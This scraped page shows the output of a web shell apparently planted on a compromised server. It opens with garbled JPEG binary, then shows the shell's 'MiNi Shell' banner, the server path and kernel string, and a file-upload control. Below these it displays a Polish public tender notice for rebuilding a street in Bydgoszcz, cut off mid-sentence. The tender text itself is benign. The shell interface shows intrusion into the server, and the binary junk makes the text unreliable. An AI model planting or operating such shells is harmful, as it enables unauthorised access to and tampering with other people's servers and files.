JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240213/0010317701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa ulicy Łęczyckiej w Bydgoszczy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Miejskich i Komunikacji Publicznej w Bydgoszczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 090476971</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Toruńska 174a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-844</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52-582-27-23</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">52-582-27-77</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zarzad@zdmikp.bydgoszcz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdmikp.bydgoszcz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Budowa i utrzymanie sieci drogowej i obiektów inżynierskich, lokalny transport zbiorowy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa ulicy Łęczyckiej w Bydgoszczy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a08e97e5-c665-11ee-bbfa-e29e26ebc6e1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00103177</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00028791/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa ulicy Łęczyckiej w Bydgoszczy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/transakcja/882913 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.platformazakupowa.pl/transakcja/882913</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie, określa niezbędne wymagania<br/>sprzętowo-aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, lub inny dowolny system operacyjny<br/>wersji umożliwiającej zainstalowanie dowolnej przeglądarki internetowej,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript, akceptująca pliki typu „cookies”,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) szyfrowanie na Platformie odbywa się za pomocą protokołu TLS 1.3,<br/>g) oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, iż po wejściu w życie, tj. po dniu 25 maja 2018 r., przepisów<br/>dotyczących ochrony danych osobowych, będzie przetwarzał dane osobowe uzyskane w trakcie postępowania, a w szczególności:<br/>dane osobowe ujawnione w ofertach, dokumentach i oświadczeniach dołączonych do oferty oraz dane osobowe ujawnione w<br/>dokumentach i oświadczeniach składanych na potwierdzenie braku podstaw wykluczenia i spełnienie warunków udziału w<br/>postępowaniu. Przetwarzanie danych osobowych przez Zamawiającego jest niezbędne dla celów wynikających z prawnie<br/>uzasadnionych interesów realizowanych przez Zamawiającego i wypełnienia obowiązku prawnego ciążącego na administratorze<br/>(Informacja o przetwarzaniu danych osobowych – zał. nr 11 do SWZ).<br/>Wykonawca przystępując do postępowania jest obowiązany do pisemnego poinformowania<br/>i uzyskania zgody każdej osoby, której dane osobowe będą podane w ofercie, oświadczeniach i dokumentach złożonych w<br/>postępowaniu. Na tę okoliczność Wykonawca złoży stosowne pisemne oświadczenie (jak we wzorze formularza ofertowego –<br/>załącznik nr 3 do SWZ).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NZ.2531.7.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane w rozumieniu art. 7 pkt 21 Pzp, polegające na przebudowie ulicy Łęczyckiej w Bydgoszczy na odcinku od ulicy Kamiennej do ulicy Curie-Skłodowskiej oraz od ulicy Curie-Skłodowskiej do ulicy Fordońskiej (bez skrzyżowania Łęczycka – Curie-Skłodowskiej )oraz Przebudowie ulicy Kamiennej w Bydgoszczy - wydłużenie lewoskrętu na skrzyżowaniu ul. Kamienna – Łęczycka, polegająca na wykonaniu nowej konstrukcji jezdni ulicy Łęczyckiej, wymianie uszkodzonych krawężników, przebudowie chodników oraz zjazdów na posesję wzdłuż ulicy Łęczyckiej na odcinku od ulicy Bocznej do ulicy Curie-Skłodowskiej po jej zachodniej stronie oraz wydłużeniu istniejącego lewoskrętu z ulicy Kamiennej w ulicę Łęczycką, w zakresie i na warunkach wykonania zamówienia, szczegółowo określonych w:<br/>1)	projektowanych postanowieniach Umowy z załącznikami, stanowiącym załącznik Nr 1 do SWZ,<br/>2)	opisie przedmiotu zamówienia (OPZ), specyfikacjach technicznych wykonania i odbioru robót budowlanych (SST) i dokumentacji, stanowiących załącznik Nr 2 do SWZ,<br/>1.	wzorze kosztorysu ofertowego dla zamówienia podstawowego, stanowiącym załącznik Nr 4.1 do SWZ i zamówienia w ramach prawa opcji, stanowiącym załącznik Nr 4.2 do SWZ<br/>2.	Zamawiający określa minimalną wartość świadczenia stron na nie mniej niż 70% wartości umowy.<br/>3.	Zamawiający nie dokonuje podziału zamówienia na części. Tym samym nie dopuszcza składania ofert częściowych, o których mowa w art. 7 pkt 15) Pzp.<br/>Powody niedokonania podziału na części:<br/>Przebudowa ulicy Łęczyckiej wymaga ścisłej koordynacji w zakresie prowadzenia robót pod ruchem ulicznym, w tym wprowadzenia kolejnych etapów tymczasowej organizacji ruchu wzajemnie od siebie zależnych. Organizacją robót powinien zatem zająć się jeden profesjonalny podmiot, który poszczególne asortymenty robót będzie mógł przeprowadzać sprawniej i nie będzie zależny od czynników zewnętrznych, jak opóźnienia w wykonaniu zakresów robót na innych odcinkach zleconych podmiotowi trzeciemu. Powyższe mogłoby skutkować opóźnieniami powodującymi dodatkowe utrudnienia dla użytkowników ruchu, przedsiębiorstw obsługiwanych z ul. Łęczyckiej oraz transportu zbiorowego a także roszczeniami finansowymi wynikającymi ze spowodowanych takim sposobem realizacji zadania przestojów. <br/>Brak podziału na części nie ogranicza dostępu do zamówienia wykonawcom z sektora małych i średnich przedsiębiorstw (MŚP). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Poza podstawowym zakresem Umowy, Zamawiający przewiduje możliwość skorzystania z opcji wskazując, iż prawem tym objęty jest zakres robót określony w załączniku nr 4.2 do SWZ - kosztorys ofertowy w ramach prawa opcji-. Zamawiający zastrzega sobie możliwość skorzystania z opcji w pełnym lub w częściowym zakresie.<br/>2.	Warunkiem uruchomienia opcji, będą faktyczne potrzeby Zamawiającego, dysponowanie środkami finansowymi oraz złożenie przez Zamawiającego pisemnego oświadczenia <br/>o skorzystaniu z opcji w określonym zakresie. Opcja jest uprawnieniem Zamawiającego, <br/>z którego może, ale nie musi skorzystać w ramach Umowy. W przypadku nieskorzystania przez Zamawiającego z opcji, Wykonawcy nie przysługują jakiekolwiek roszczenia z tego tytułu, <br/>w tym roszczenie o realizację zamówienia opcjonalnego.<br/>3.	Uruchomienie prawa opcji może nastąpić najpóźniej do dnia 15 listopada 2023 roku, poprzez złożenie oświadczenia przez Przedstawiciela Zamawiającego <br/>4.	Zamawiający może skorzystać z prawa opcji wielokrotnie, do wyczerpania zakresu robót objętego opcją. <br/>5.	Jeżeli Umowa nie stanowi inaczej, zasady odnoszące się do realizacji zamówienia podstawowego, mają zastosowanie tak samo do robót wykonywanych w ramach opcji. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami:<br/>1)	Cena (C) – waga 60% (pkt)<br/>2)	Okres udzielania gwarancji jakości na wykonane roboty budowlane (G) – 40%.<br/>2.	Sposób przyznawania punktów: <br/>1)	opis kryterium cena (C): <br/>Kryterium rozpatrywane będzie na podstawie ceny oferty brutto, zadeklarowanej przez wykonawcę w formularzu ofertowym.<br/>W tym kryterium oferta może uzyskać maksymalnie 60,00 punktów. <br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Liczba punktów (C) w tym kryterium zostanie obliczona wg wzoru:<br/>	C =	Cmin <br/>	Co x 60 pkt<br/>Gdzie:<br/>C – liczba punktów uzyskanych przez ocenianą ofertę w kryterium cena<br/>Cmin – najniższa cena oferty za wykonanie zamówienia podstawowego i objętego prawem opcji spośród nieodrzuconych ofert <br/>Co – cena ocenianej oferty za wykonanie zamówienia podstawowego i objętego prawem opcji <br/>2)	Opis kryterium okres udzielania gwarancji jakości na wykonane roboty budowlane (G):<br/>Kryterium rozpatrywane będzie na podstawie zadeklarowanej w formularzu ofertowym długości gwarancji udzielonej na wykonane roboty budowlane <br/>Minimalna długość gwarancji – 5 lat. Wykonawca może zaproponować wydłużenie gwarancji do 6 lub 7 lat.<br/><br/>W tym kryterium oferta może uzyskać maksymalnie 40,00 punktów.<br/>Liczba punktów (T) w tym kryterium zostanie przyznana następująco:<br/>7 lat – 40 pkt,<br/>6 lat – 20 pkt,<br/>5 lat – 0 pkt,<br/>3.	Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów, wyliczoną zgodnie z wzorem: P = C + G gdzie:<br/>P – łączna liczba punktów oferty ocenianej<br/>C – liczba punktów uzyskanych w kryterium cena <br/>G – liczba punktów uzyskanych w kryterium okres udzielania gwarancji jakości na wykonane roboty budowlane <br/>Jeżeli Zamawiający nie będzie mógł wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę. <br/>Wykonawcy, składający oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>Zamawiający udzieli zamówienia wykonawcy, którego oferta odpowiada wszystkim wymaganiom Pzp oraz SWZ i została uznana jako najkorzystniejsza spośród ofert nieodrzuconych, w oparciu <br/>o podane wyżej kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielania gwarancji jakości na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczące zdolności technicznej lub zawodowej w zakresie:<br/>1)	doświadczenia wykonawcy <br/>Wykonawca zobowiązany jest wykazać się doświadczeniem w wykonaniu, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwóch robót budowlanych, polegających na przebudowie ulicy o docelowej nawierzchni ścieralnej z SMA o powierzchni minimum 5 000 m2 każda.<br/><br/>UWAGA: Zamawiający uzna warunek za spełniony tylko w przypadku wykazania dwóch odrębnych zadań spełniających powyższy warunek<br/><br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 58 Pzp <br/>ww. warunek udziału w postępowaniu spełniają w następujący sposób: przynajmniej jeden <br/>z tych wykonawców musi posiadać doświadczenie w ww. zakresie, z tym że wymóg posiadania doświadczenia dotyczy wykonawców zamierzających bezpośrednio realizować zamówienie.<br/>2)	osób skierowanych przez wykonawcę do realizacji zamówienia <br/>Wykonawca zobowiązany jest wykazać się dysponowaniem osobami, które skieruje do realizacji zamówienia, gwarantującymi właściwą jakość robót budowlanych, o kwalifikacjach zawodowych i doświadczeniu zawodowym nie mniejszym niż określono poniżej, dla poszczególnych funkcji, tj.:<br/>a)	kierownik budowy – minimum 1 osoba:<br/>	minimalne kwalifikacje zawodowe: <br/>posiada uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej,<br/>	minimalne doświadczenie zawodowe: <br/>trzy lata doświadczenia zawodowego w kierowaniu robotami budowlanymi jako kierownik budowy lub kierownik robót drogowych, liczone od daty uzyskania wymaganych uprawnień budowlanych;<br/>Osoby odpowiedzialne za kierowanie robotami budowlanymi winny posiadać uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie, wymagane przepisami ustawy z dnia 7 lipca 1994 Prawo budowlane (wg stanu prawnego obowiązującego na dzień wszczęcia postępowania). <br/>Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej samej specjalności.<br/>Wykonawcy wspólnie ubiegający się o zamówienie na podst. art. 58 Pzp, spełniają warunek, jeżeli co najmniej jeden z nich dysponuje osobami o kwalifikacjach, uprawnieniach <br/>i doświadczeniu zawodowym w zakresie określonym powyżej, z tym że wymóg ten dotyczy wykonawcy, który bezpośrednio wykona roboty budowlane, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności<br/>informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 Pzp w zakresie podstaw wykluczenia wskazanych przez<br/>Zamawiającego, o których mowa w art. 108 ust. 1 oraz art. 109 ust.1 pkt 4 Pzp oraz art. 7 ust. 1 ustawy<br/>z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego. Uwaga: Oświadczenie/a składają odpowiednio: wykonawca / każdy z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia / podmiot trzeci, na którego potencjał powołuje się wykonawca celem potwierdzenia<br/>spełnienia warunków udziału. Wzory oświadczeń stanowią Załącznik nr 11 i 12 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykazy robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy <br/>- w tym okresie, wraz z podaniem ich rodzaju, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (sporządzonych wg wzorów Zamawiającego), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty. Wzór wykazu stanowi załącznik Nr 9 do SWZ.<br/>Uwaga: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonanych wspólnie z innymi wykonawcami, to ww. wykaz robót budowlanych dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>Wykonawca wykazując doświadczenie może uczynić to jedynie w zakresie, w którym sam je nabył. Jeśli doświadczenie zostało nabyte w ramach wykonawców występujących wspólnie (np. konsorcjum) to wykazaniu podlega doświadczenie powstałe jedynie <br/>w granicach wykonania robót przez dany podmiot.<br/>2)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz 